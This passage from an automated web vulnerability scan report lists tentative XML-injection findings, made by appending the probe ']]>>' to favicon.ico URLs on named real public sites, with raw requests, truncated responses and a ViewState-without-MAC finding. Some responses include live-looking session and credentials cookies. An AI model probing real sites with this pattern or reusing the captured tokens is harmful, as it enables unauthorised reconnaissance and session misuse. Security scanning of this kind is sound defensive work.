Host:   http://www.examiner.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.examiner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 12:45:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 12:45:23 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1301748323"
Set-Cookie: EXAMINEREDITION=921; expires=Tue, 30-Mar-2021 12:45:23 GMT; path=/; domain=.examiner.com
X-Generator: Drupal 7 (http://drupal.org)
X-WebNode: web8.b.examiner.com
Vary: Accept-Encoding
Content-Length: 57361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
.w3.org/2000/01/rdf-schema#"
xmlns:sioc="http://rdfs.org/sioc/ns#"
xmlns:sioct="http://rdfs.org/sioc/types#"
xmlns:skos="http://www.w3.org/2004/02/skos/core#"
xmlns:xsd="http://www.w3.org/2001/XMLSchema#"
xmlns:v="http://rdf.data-vocabulary.org/#">
...[SNIP]...
10.12. http://www.foodnetwork.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.foodnetwork.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix)
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:24:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80624


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


<head>
   <title>404 Error Page : ABOUT US : Food Network</title>
   <meta name="description" conten
...[SNIP]...
<!--Endeca request http://searchServices.scrippsnetworks.com/food/service/dinnerTonight/dinnerTonight.xsl/dinnerTonight-5,0.xml -->
...[SNIP]...
10.13. http://www.hollywoodlife.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hollywoodlife.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodlife.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 02 Apr 2011 13:54:54 GMT
Pragma: no-cache
Server: nginx/0.7.62
X-Pingback: http://www.hollywoodlife.com/xmlrpc.php
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Cache-Control: no-cache, must-revalidate
Expires: Sat, 02 Apr 2011 13:54:55 GMT
Date: Sat, 02 Apr 2011 13:54:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   
...[SNIP]...
<a href="http://feedproxy.google.com/~r/insidetvblog/~3/KwyIIdus1_I/" target="_blank">Soap Round-Up: 'B&Bs' Ridge Chooses Brooke and More</a>
...[SNIP]...
10.14. http://www.house.gov/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.house.gov
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.house.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: USHR Webserver Ver 5.4.1
Content-Type: text/html
Content-Length: 13462
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:34:45 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
10.15. http://www.k12.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.k12.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.k12.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:41:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 01 Apr 2011 15:55:02 GMT
ETag: "4176-49fdd6ec78180"
Accept-Ranges: bytes
Content-Length: 16758
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
pics-label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 c 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0) "http://www.icra.org/ratingsv02.html" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r(n 0 s 0 v 0 l 0))
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:tal="http://xml.zope.org/namespaces/tal">
...[SNIP]...
10.16. http://www.kazaa.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kazaa.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kazaa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
ETag: "a092413087f137824e790b00075a20d9"
X-Runtime: 96
X-Head-Commit-Id: 9ff26652e060b35b7a084c6dec4ac8c9dbfa1e55
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: user_credentials=a6b11f5254763bfd36d48454c6ea8e88434ebe9027e7c8af2e224f92f45b9d3d7fd11cb99551a0ae3170b0ded4e7a12b4329091a4b9f64bbe46b6760be6fde62%3A%3A13625354; domain=.kazaa.com; path=/; expires=Mon, 02-May-2011 13:44:08 GMT
Set-Cookie:
Set-Cookie: _music.kazaa.net_session=BAh7CjoPc2Vzc2lvbl9pZCIlYzAzZTE3YmNlM2JhOWY1Y2U0MGYxYjc4NzIxYzcyYjM6EF9jc3JmX3Rva2VuIjFBVHE5WC9nWUFwUjBsd3BOL2krTzFOcXl2ZWx4WXlDQ1FZaVV2ZVllWi9rPSIVdXNlcl9jcmVkZW50aWFscyIBgGE2YjExZjUyNTQ3NjNiZmQzNmQ0ODQ1NGM2ZWE4ZTg4NDM0ZWJlOTAyN2U3YzhhZjJlMjI0ZjkyZjQ1YjlkM2Q3ZmQxMWNiOTk1NTFhMGFlMzE3MGIwZGVkNGU3YTEyYjQzMjkwOTFhNGI5ZjY0YmJlNDZiNjc2MGJlNmZkZTYyOg5yZXR1cm5fdG8iBi8iGHVzZXJfY3JlZGVudGlhbHNfaWRpAwrozw%3D%3D--e64fdf6f82b57ebac5100fbfafabbbf135f01f48; domain=.kazaa.com; path=/; HttpOnly
Content-Length: 19127
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html version='XHTML+RDFa 1.0' xmlns:audio='http://purl.org/media/audio#' xmln
...[SNIP]...
erms='http://purl.org/dc/terms/' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:media='http://purl.org/media#' xmlns:vcard='http://www.w3.org/2001/vcard-rdf/3.0#' xmlns:xsd='http://www.w3.org/2001/XMLSchema#' xmlns='http://www.w3.org/1999/xhtml'>
...[SNIP]...
10.17. http://www.macrumors.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.macrumors.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.macrumors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:47 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 101132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" co
...[SNIP]...
<br />
New channels: CNBC World, C-SPAN, C-SPAN 2, C-SPAN 3, Chiller, Disney XD, G4, Home Shopping Network, Jewelry Television, QVC, Sleuth, Soap Net, Style, Golf Channel, and WE tv.<br />
...[SNIP]...
10.18. http://www.orbitz.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.orbitz.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orbitz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 277
Date: Sat, 02 Apr 2011 13:34:54 GMT
Age: 0
Connection: close
Server: Apache
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/


   <?xml version="1.0" encoding="utf-8"?>
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html>
   <head>
       <title>404 Not Found</tit
...[SNIP]...
10.19. http://www.psu.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache/1.3.37 (Unix)
Content-Type: text/x-server-parsed-html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
10.20. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:15:17 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=8h1lg1ot2b7s39p6g99af3nha0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<a href="http://sudsonbleeker.com/feed/">xml feed</a>
...[SNIP]...
10.21. http://www.southwest.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.southwest.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.southwest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Set-Cookie: JSESSIONID=7BAC1D4D1BC33E55F57BA2ACBC41FAFE; Path=/flight
Set-Cookie: DiscCookie=disc=0%3A10%3A1301750911.143000%3A7290%408E1163BE687E63C94EE3D51AF74E9466FEB3DEE6; path=/; domain=www.southwest.com;
Set-Cookie: AccountBarCookie=136047110112112124130123129091110122114047071123130121121057047112121110128128047071047112124122059128132110112124127125059112124122122124123059078112112124130123129079110127080124124120118114099110121130114128047057047114133125118127114128047071123130121121057047121124116118123082127127124127047071123130121121057047121124134110121129134047071115110121128114057047127127078112112124130123129091130122111114127047071123130121121057047129118114127047071123130121121057047133113118116114128129047071123130121121057047133118125110113113127047071047062068064059062070064059063062065059063065064047057047133129118122114124130129047071047061065060061063060063061063062045062064071063069071064062047138; Domain=www.southwest.com; Expires=Thu, 01-Apr-2021 23:36:11 GMT; Path=/
Vary: Accept-Encoding
X-Swa-ws: BAHQL
Content-Length: 54232

<?xml version="1.0" encoding="utf-8"?>


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Southwest Airlines - File Not Found</title>
<meta http-equiv=
...[SNIP]...
10.22. http://www.ufl.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.ufl.edu
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ufl.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:12 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 5724

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
10.23. http://www.ultimate-guitar.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ultimate-guitar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 13:34:54 GMT
Content-Type: text/html
Connection: close
Content-Length: 6622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>#404 | File Missing @ Ultimate-Guitar.Com</title>
<meta HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.ultimate
...[SNIP]...
<img src="http://img.ultimate-guitar.com/_img/xml.gif" width="32" height="14" border="0" align="absmiddle">
...[SNIP]...
10.24. http://www.usgs.gov/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.usgs.gov
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usgs.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: accept-language,accept-charset
Date: Sat, 02 Apr 2011 13:49:52 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
10.25. http://www.where2getit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.where2getit.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.where2getit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:33 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Vary: accept-language,accept-charset,Accept-Encoding
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1052

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
10.26. http://www.wimp.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.wimp.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wimp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 13:27:01 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
10.27. http://www.wunderground.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.wunderground.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wunderground.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 12:46:27 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Cache-control: no-cache, must-revalidate, no-cache="Set-Cookie", private
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-CreationTime: 0.028
Set-Cookie: DT=1301748387:21949:365-o3; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 21219


<!DOCTYPE HTML>
<html>
   <head>
   <meta name="viewport" content="width=1008px">
   <meta name="description" content="Weather Underground provides weather information for worldwide locations, including cu
...[SNIP]...
<a href="http://wiki.wunderground.com/index.php/API_-_XML">API / XML Feeds</a>
...[SNIP]...
11. ASP.NET ViewState without MAC enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tasteofhome.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tasteofhome.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:51:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_headTag"><
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjUzNTk5OTE4D2QWAmYPZBYCAgUQZGQWBAIHD2QWBgICDw8WBB4HRW5hYmxlZGgeB1Zpc2libGVoZGQCAxBkZBZcZg9kFgICAQ8PFgYeC05hdmlnYXRlVXJsBRtodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS8eCENzc0NsYXNzBQpIZWFkZXJNZW51HgRfIVNCAgJkFgRmDw8WAh4ISW1hZ2VVcmwFFS9pbWFnZXMvc2l0ZS9ob21lLnBuZ2RkAgEPFQEAZAIBD2QWAgIBDw8WBh8CBSJodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzHwMFCkhlYWRlck1lbnUfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBB1JlY2lwZXNkAgIPZBYCAgEPDxYGHwIFKmh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1NlYXJjaC9BZHZhbmNlZB8DBQxtZW51LXJlY2lwZXMfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBD0FkdmFuY2VkIFNlYXJjaGQCAw9kFgICAQ8PFgYfAgUpaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9Db3Vyc2UfAwUMbWVudS1yZWNpcGVzHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQZDb3Vyc2VkAgQPZBYCAgEPDxYGHwIFLmh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvSW5ncmVkaWVudHMfAwUMbWVudS1yZWNpcGVzHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQtJbmdyZWRpZW50c2QCBQ9kFgICAQ8PFgYfAgU6aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9Ib2xpZGF5cy0tLUNlbGVicmF0aW9ucx8DBQxtZW51LXJlY2lwZXMfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBCEhvbGlkYXlzZAIGD2QWAgIBDw8WBh8CBSlodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9Ub3AtMTAtUmVjaXBlcx8DBQxtZW51LXJlY2lwZXMfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBDlRvcCAxMCBSZWNpcGVzZAIHD2QWAgIBDw8WBh8CBSJodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzHwMFDG1lbnUtcmVjaXBlcx8EAgJkFgRmDw8WBB8FZR8BaGRkAgEPFQEHTW9yZS4uLmQCCA9kFgICAQ8PFgYfAgUiaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vSGVhbHRoeR8DBQpIZWFkZXJNZW51HwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQdIZWFsdGh5ZAIJD2QWAgIBDw8WBh8CBTNodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9IZWFsdGh5L1JlY2lwZS1NYWtlb3ZlcnMfAwUMbWVudS1oZWFsdGh5HwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VARBSZWNpcGUgTWFrZW92ZXJzZAIKD2QWAgIBDw8WBh8CBTJodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9IZWFsdGh5L01lbnVzLS0tUmVjaXBlcx8DBQxtZW51LWhlYWx0aHkfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBDUhlYWx0aHkgTWVudXNkAgsPZBYCAgEPDxYGHwIFMGh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0hlYWx0aHkvU3BlY2lhbC1EaWV0cx8DBQxtZW51LWhlYWx0aHkfBAICZBYEZg8PFgQf